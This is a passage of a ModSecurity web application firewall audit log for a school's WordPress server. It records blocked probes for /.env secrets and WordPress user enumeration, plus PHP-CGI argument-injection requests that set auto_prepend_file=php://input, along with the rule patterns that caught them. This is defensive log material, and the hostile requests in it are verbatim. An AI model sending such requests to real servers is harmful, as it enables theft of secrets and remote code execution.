"CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823807332044 730 (- - -) Stopwatch2: 1749823807332044 730; combined=334, p1=297, p2=0, p3=0, p4=0, p5=37, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08069674-Z-- --c99e7c00-A-- [13/Jun/2025:21:33:15 +0700] aEw2qx1N9VxFJpQ5cVgScgAAAI4 103.236.140.4 47082 103.236.140.4 8181 --c99e7c00-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 173.242.108.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.242.108.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c99e7c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c99e7c00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749825195014697 2666 (- - -) Stopwatch2: 1749825195014697 2666; combined=1432, p1=439, p2=957, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c99e7c00-Z-- --07f9a261-A-- [13/Jun/2025:22:06:08 +0700] aEw-YO9dCOerv4VGhqStHwAAAAs 103.236.140.4 44236 103.236.140.4 8181 --07f9a261-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.166.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.166.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --07f9a261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07f9a261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749827168294934 812 (- - -) Stopwatch2: 1749827168294934 812; combined=341, p1=298, p2=0, p3=0, p4=0, p5=42, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07f9a261-Z-- --8192b175-A-- [13/Jun/2025:22:13:50 +0700] aExALu9dCOerv4VGhqSwlgAAAAk 103.236.140.4 58698 103.236.140.4 8181 --8192b175-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.39.93.93 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.39.93.93 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8192b175-C-- --8192b175-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8192b175-E-- --8192b175-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749827630360357 4415 (- - -) Stopwatch2: 1749827630360357 4415; combined=3104, p1=409, p2=2672, p3=0, p4=0, p5=23, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8192b175-Z-- --1ff4370f-A-- [13/Jun/2025:22:37:25 +0700] aExFtR1N9VxFJpQ5cVgxEQAAAJU 103.236.140.4 45028 103.236.140.4 8181 --1ff4370f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --1ff4370f-C-- --1ff4370f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ff4370f-E-- --1ff4370f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749829045031713 4256 (- - -) Stopwatch2: 1749829045031713 4256; combined=2584, p1=517, p2=2024, p3=0, p4=0, p5=43, sr=122, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ff4370f-Z-- --79622012-A-- [13/Jun/2025:23:08:30 +0700] aExM_smhAKaFi0V9-RPViAAAAMA 103.236.140.4 55914 103.236.140.4 8181 --79622012-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.75.35.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.75.35.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --79622012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79622012-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749830910581952 2540 (- - -) Stopwatch2: 1749830910581952 2540; combined=1289, p1=416, p2=844, p3=0, p4=0, p5=29, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79622012-Z-- --f30a0304-A-- [13/Jun/2025:23:23:45 +0700] aExQke9dCOerv4VGhqTf3wAAABg 103.236.140.4 48710 103.236.140.4 8181 --f30a0304-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36 Accept-Charset: utf-8 --f30a0304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f30a0304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749831825574703 771 (- - -) Stopwatch2: 1749831825574703 771; combined=316, p1=277, p2=0, p3=0, p4=0, p5=38, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f30a0304-Z-- --e80eef6e-A-- [13/Jun/2025:23:51:39 +0700] aExXGx1N9VxFJpQ5cVhwBwAAAIg 103.236.140.4 52180 103.236.140.4 8181 --e80eef6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.218.116.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.218.116.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e80eef6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e80eef6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749833499156256 3082 (- - -) Stopwatch2: 1749833499156256 3082; combined=1313, p1=460, p2=823, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e80eef6e-Z-- --9048230c-A-- [14/Jun/2025:01:15:31 +0700] aExqw8mhAKaFi0V9-RPw8AAAAMo 103.236.140.4 53398 103.236.140.4 8181 --9048230c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.141.90.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.141.90.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9048230c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9048230c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749838531046380 2909 (- - -) Stopwatch2: 1749838531046380 2909; combined=1267, p1=435, p2=800, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9048230c-Z-- --d370f802-A-- [14/Jun/2025:01:46:47 +0700] aExyF-9dCOerv4VGhqTmYQAAAAw 103.236.140.4 53538 103.236.140.4 8181 --d370f802-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.79.182.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.79.182.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d370f802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d370f802-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749840407070386 3393 (- - -) Stopwatch2: 1749840407070386 3393; combined=1419, p1=467, p2=909, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d370f802-Z-- --4f6fea66-A-- [14/Jun/2025:02:48:34 +0700] aEyAkh1N9VxFJpQ5cVhwZgAAAI8 103.236.140.4 55256 103.236.140.4 8181 --4f6fea66-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 84.44.64.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 84.44.64.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4f6fea66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f6fea66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749844114254057 3137 (- - -) Stopwatch2: 1749844114254057 3137; combined=1339, p1=465, p2=845, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f6fea66-Z-- --c296fd41-A-- [14/Jun/2025:03:10:22 +0700] aEyFrsmhAKaFi0V9-RPycgAAAMk 103.236.140.4 59470 103.236.140.4 8181 --c296fd41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.101.240.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.101.240.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c296fd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c296fd41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749845422764199 2495 (- - -) Stopwatch2: 1749845422764199 2495; combined=1172, p1=374, p2=771, p3=0, p4=0, p5=27, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c296fd41-Z-- --62067f6a-A-- [14/Jun/2025:03:21:18 +0700] aEyIPh1N9VxFJpQ5cVh4RAAAAI0 103.236.140.4 35170 103.236.140.4 8181 --62067f6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --62067f6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62067f6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749846078619941 688 (- - -) Stopwatch2: 1749846078619941 688; combined=257, p1=229, p2=0, p3=0, p4=0, p5=28, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62067f6a-Z-- --5d0afb2b-A-- [14/Jun/2025:03:37:29 +0700] aEyMCf8ql0QLmijbYWZXXQAAAEA 103.236.140.4 40844 103.236.140.4 8181 --5d0afb2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; F5321) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --5d0afb2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d0afb2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749847049893569 835 (- - -) Stopwatch2: 1749847049893569 835; combined=336, p1=293, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d0afb2b-Z-- --c19ce864-A-- [14/Jun/2025:03:57:17 +0700] aEyQrWIDXuKmWNi2UBSvMQAAAFQ 103.236.140.4 42968 103.236.140.4 8181 --c19ce864-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.166.209.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.166.209.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c19ce864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c19ce864-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749848237895558 2392 (- - -) Stopwatch2: 1749848237895558 2392; combined=1128, p1=354, p2=746, p3=0, p4=0, p5=27, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19ce864-Z-- --a9cd8109-A-- [14/Jun/2025:04:30:45 +0700] aEyYhUMWfhkd5Y0sFtrlXAAAAIg 103.236.140.4 48394 103.236.140.4 8181 --a9cd8109-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.254.177.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.254.177.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9cd8109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9cd8109-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749850245940456 3235 (- - -) Stopwatch2: 1749850245940456 3235; combined=1359, p1=429, p2=899, p3=0, p4=0, p5=30, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9cd8109-Z-- --65b80275-A-- [14/Jun/2025:04:39:29 +0700] aEyakWmwZ6YUkjOdtI6-PwAAAA4 103.236.140.4 48418 103.236.140.4 8181 --65b80275-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.0 Safari/537.36 Accept-Charset: utf-8 --65b80275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65b80275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749850769379249 909 (- - -) Stopwatch2: 1749850769379249 909; combined=343, p1=301, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65b80275-Z-- --c36b966a-A-- [14/Jun/2025:04:55:41 +0700] aEyeXWmwZ6YUkjOdtI6-TwAAABA 103.236.140.4 48518 103.236.140.4 8181 --c36b966a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 68.104.182.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 68.104.182.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c36b966a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c36b966a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) 